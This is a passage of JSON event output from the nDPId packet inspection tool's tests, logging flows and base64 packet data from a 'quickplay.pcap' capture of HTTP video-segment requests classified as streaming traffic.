+01505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1429000118045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":831,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":831,"pkt_l4_len":795,"thread_ts_msec":1429000118045,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAy+57kAArQaZmTazjEEKNqn6AFDcPeCiut6WGFOiUBgIJVI5AABIVFRQLzEuMSAyMDAgT0sNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQpEYXRlOiBUdWUsIDE0IEFwciAyMDE1IDA4OjI4OjM3IEdNVA0KU2VydmVyOiBUZW5naW5lLzIuMC4xDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD11dGYtOA0KQ29udGVudC1MZW5ndGg6IDU1Ng0KDQofiwgAAAAAAAADBMHXokMwAADQD+pDVCuuR7VCzdrerESNxijK199zgLVnYggNE5ULioIZGP6CKSQ+J1Ue9LQPP\/PeL9xYw3Gkgs8aCeFd\/zZqCdqbSs4SDagv3Q8gbXJOLHNZZfmdTsJ6vPDYpe+\/rdailf+Vy4WCt5JCSfPLvLm\/VjBPjj45GMX6eUks60t+xxt21vhZm+cZaqa7DoZ7yob2ejBdIHAVjR1TTdJhFubG5KBya8nY0zzMWLsuzvCvt9glIynGQHg+BLRZzPC8ZTGPUy
OvUh05tiZ\/balrrwKQt2cEeJstEBP0D5BLZnKvY160w+\/OrxB+sjFauMt5dnHUcI3t7SoTqChgxCrhMkNhG6YVl2LK8pgjuYhqcDRox+KgQzOA\/hLmGzg3uirtssbFIVC5Aro3ACcGCwISGwb1VxWHonPvyWHNDlG81Bqq3QQetunNZnl6oz4rq\/ZHNPTVG61wMgLdvvo4GWhjgZ\/bnblrSFNGd7Mdr5MexXVx6SfeJVyvwBelPETxWHKKoRDa8ZjUvT0cEJOB7G\/G7e4ZZ\/83OAc7CIIAAEA\/iIulwzriBqhJkUE6bpVlTg1QY+rX1\/uCF5JNOyMtykH7DdhqEwaXY8s7mPz38wS8mngvjnR+4AS+bZOCqFuqMeaMn6SzJIMOPFhSp7GcsxUbtqiwMa7\/yvtnpf2t24H4WaAC+sVExSgCQaWyVTSeVY6vezz8ABeIl3WAAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1429000153937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000153937,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeag6kAAPwZJswo2qfp4HCMoyzEAUC00WpDdwOXGUBgBycCpAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDgudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0048.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +02356{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1429000156273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"thread_ts_msec":1429000156273,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaB3UUAArQYBdngcIygKNqn6AFDLMd3LpTQtNFxOUBAIItXfAAChEIrgrleYAhFa3F3938BggSrcIn+nqVX5sByKXTUtTZ+S0IwO\/hIwf0BB2uc3Bf5jC1QfzUHjRvDUIOnnsb5a0uxxhiIVAqWnEYC45w18yjCMLPuOKVZeOYgfCQVjYsxLAKkdXaRkmMu4Zoel0HztrVYR1cnta\/vSYGQ0WkMhgl3KFYUm\/X4qjjWEdowcfDAWr\/FWJBR4jsXSxR8EQOd7RYpfWOl0YqAXrcURgivoA\/Vazm9dSSQ6DzW0D1TNTghMrqCseZaLLp2diY5etWqcT5Lxxdnl2ino6PEahKmf04RjOZq83lwn5PEPti9QeNcfMNctSiHj28O5VeDtauVKLipzStAYJu6O1tMaMLByrHeLYYc5MbsLRR9vao6KZRnJE1AEzpmLa\/+YrNJZcLrW3joqQ2AvZzJNsHv1pr7090xMkT87olqCX5Yd5dgxMvv2CbBfzbv7iN0239xxLePmefbZXxmf1ljpyZUWt+YUi19f0cGaafC5roKKnRsDLjalFhQzNZMDN1+qROgcpPpFrfcPRzSCRX2oM3IXqFNyhnIqEBeoqjt\/rN0OghieSXA+J4\/fnibDY2oBF\/qPi7PmT7+EZQfp4dOU7LXGxwfkHyb\/+nSUhuDDHBPkRtLg+XO3xXfDG63CCzgP9j+ew7ylJL7s8zjEAnk0iP7KsAXK1fFcvUkB5LITD3qa1hjsRXNIyWIaxMkwR8GhlPLtf0hpPiS0Um8a1yduUSn4xM5n3AHwQrDyknL7fxErOcmIBqXcP2oyyyTV+m9b64iHrtRxBINGeYaff6lhmqnRqCvGC1F52Og\/seNDfW8RWv4yBXzQwblMI7xviVAgMjEyKmjtOXwyzWj0J+YuHjA3wXbbyRFf\/zujxfqXq0HOg5HobG69sZOgCtlNOxGxs6uNG3Nyl1bm6YuhORfGFVH4dDhxB4pM4mawqKQgNd3ZivrDKzWiLphhw89pFSEPmrYR+dSw4\/6dNuOLRnG16Am5LUzsom4k95ky9x\/PVPzeU+5ie6mhY
pgOrbjeFpz+rg+m9C+NB8SEBd6muVe4B37GCYUkUck7iEmhbPSKsrUqKYVveBJ0WJIstk9mKFzxlfKH3J2\/bjYqxEQYbmgG6oJ5ralnDKawN31PTuvOshsQceM7W53\/H7rfpivL6lr\/kjGpOhEd9Dxxlf9p+4v7nxfQAiorCo+Ipnx1Vx4\/M8DFoeolmxcpnpC1\/t87cEimWGKlQKNWBmqgBX3lF+jG0RumppZSWz\/aQfU6VQwCojXD7XsZoKlt0fqkAcQPgNbx4gtOwebSddbvGBn7uPBEFCe1qtOY1P6e8nyGK8y1LANkR3tsNsXJFvHkj5HBf+Fth6gbnan75B2fOeWrkdUU90lajYKwLL1LL5gxqWv1nPgRm5gG0V\/LUY3dCEIra5BI+d3CAtAPKtdluT\/JXWML4j3eAT74+s9ouu5yox25rXWvrCvhcuf5BYDjdzBBmrYB\/t4fb52bttXAQuL80qQnY5Oj1X5f+Um3rpgjwFtGj7n30bbQASEZTdFPUOe8kJs7mBkrIY6yotsjZG+hKNfMJZdhU8ZShuzC8djNjp9NuCLli+\/ugxOOk4+twmaL+UUbEqGDcxcAEBa5EyOAV7RfqezgWcaQ3dbJjWXdNWxetLCdQ7XanJt3eAkt933KoymlC4XmU95LAhWF33+FFwL3BYas4y5X8wDDUnULI8QtkzKEN2oLGgIewtkuDrW4wpL3EZsIKv86JV8UzFxUMaP2MiczrH7WqOOsj1ytSR\/mRWDeXJftrtXq0qR46GntPeDZXJQKpY9CB2cQr+2LnDbM8iBOGE8HrF8a0W0JfepPoC6ozHQ5CxM0HE7L3V4aaQ=="} +01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1429000156459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000156459,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaip0AAPwZH9go2qfp4HCMoyzEAUC00XE7dy64AUBhgH5dQAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":112,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1429000052350,"flow_last_seen":1429000055158,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1429000184253,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1429000207973,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000207973,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYfhkAAPwbLFwo2qfp4HCMoyzIAUDz1EP7kfsOCUBgByRv\/AABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTIudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0052.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1429000210014,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":128,"pkt_l4_len":92,"thread_ts_msec":1429000210014,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHCiFUAArQbb4XgcIygKNqn6AFDLMuSI3uA89RK8UBgIIiZoAAA7o06lOUMR9b0tN4NqWqjYHmUkbAcezqY5k1Ckm0MtYSmllf\/mEyyNorAHBlAKlc3tlqWmVMYy6YLe45g7yxi7BP1GlteorxU="} 
+01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1429000210215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000210215,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYhUEAAPwbJTQo2qfp4HCMoyzIAUDz1ErzkiN8oUBhgH586AABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTMudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1429000237766,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000237766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYTSEAAPwbXVQo2qfp4HCMoyzMAUBi\/CFv73vENUBgByQDsAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTUudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0055.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01271{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1429000239838,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":652,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":652,"pkt_l4_len":616,"thread_ts_msec":1429000239838,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAnwr2EAArAZRE3gcIygKNqn6AFDLM\/vq+JsYvwoZUBgIInF9AABzYj3YcVRlOp3c+LTFyFpK8hJq+9ow2Mvt7DtOuHGzxpnR+3r13CHw+E3iWLlq+exgWJJWm8EH8pTbwRe+x8\/D4xNXRBwksI9Csb4QsiJPsfT2+RDiLS02aidPx7uSbhK8jMvrBH5tHxdpa1MFSWCqjYPTrHUzNzOA9TY5FgYYDDMkEDm7gO5123w4n1MAhsXStfcoQ3nSRMywWBjQbHZWkL++gHWx\/\/bzYnpJ21s22WZTz+idJIBFeazv4DxMARlrjHvFswfnI5PHnRRlJ35I7r1qBSMNM3mL3d8eBq5Li+cUyPU9itxuknh7PGxS38quOs1TDTVg7FntfS3WF5atx9VBXKTp0aVWtu3ILXC6hNWU\/3GWggrR0a3pT3Hg6QnXTm4c911OZjeTJVo9BcqKuNrC54rvRTCDA32\/HDU6hjsWUORfbA\/u7H1kGeJSFG\/fOMyzkamr7WzvqgnibwnuBc0xZxB9tpVk0llxH2XWzC3EK3M6+lvnjFarcNCJ93EYtE6CK75PtO2Yi7ZSrr3mOwYlgtK8Yp0yb7vwqI\/2DSjngCc+Sn1445B4mHIXhp7fd7CP2bpJi3Gy6qjSlxiy6iOAVea4ViBsitRQkSJFsgN9tKobyQWEjA0Iq\/LCYaZ8fynI94mgU9gbtQkXI5Y7NPc0FmJseEdZ62w2m6qgfXo6nPxb2wkFc\/k2DVuvOgbbk\/FGlh+lWIZwut4KOX\/pap\/MEzShFHEPoHfax3dVeu1dix8C0CE3+qvmRiSOV8\/NDfdKpdkErPHZ3dWKhtrNlCDmPw=="} 
+01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1429000240020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000240020,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYVGUAAPwbVhAo2qfp4HCMoyzMAUBi\/Chn76vrvUBhgH5XpAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1429000347103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000347103,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaYDkAAPwZSjwo2qfp4HCMoyzUAUMz93a23S9rhUBgBydEWAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
